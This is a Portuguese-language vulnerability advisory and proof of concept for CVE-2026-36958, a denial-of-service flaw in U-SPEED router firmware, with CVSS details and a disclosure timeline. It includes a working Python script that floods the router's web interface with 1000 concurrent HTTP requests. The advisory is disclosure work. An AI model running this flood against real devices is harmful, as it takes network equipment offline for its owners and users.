
Prova de conceito para CVE-2026-36958, uma vulnerabilidade de negação de serviço no firmware do roteador U-SPEED que esgota recursos por meio de solicitações HTTP concorrentes, fazendo com que a interface web fique sem resposta.
ID CVE: CVE-2026-36958 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: U-SPEED Produto: Roteador U-SPEED Versão do Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos Não Controlado
O firmware V1.0.0 do Roteador U-SPEED é vulnerável a Negação de Serviço. Ao enviar um grande número de requisições HTTP concorrentes para endpoints aleatórios ou inexistentes na interface de gerenciamento web, um atacante pode esgotar os recursos do sistema no servidor HTTP Boa embarcado. Isso faz com que a interface web do roteador fique sem resposta e pode exigir uma reinicialização manual para restaurar a operação normal.
Pontuação CVSS v3.1: 7.5 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrica | Valor |
|---|
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhuma |
| Impacto na Confidencialidade | Nenhum |
| Impacto na Integridade | Nenhum |
| Impacto na Disponibilidade | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Comportamento Esperado: O servidor deve lidar com conexões concorrentes de forma graciosa. Comportamento Real: A interface web fica sem resposta; reinicialização manual necessária.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidade descoberta |
| 2026-04-29 | Reportada à MITRE |
| 2026-04-29 | CVE-2026-36958 atribuído |
| 2026-04-29 | Divulgação pública |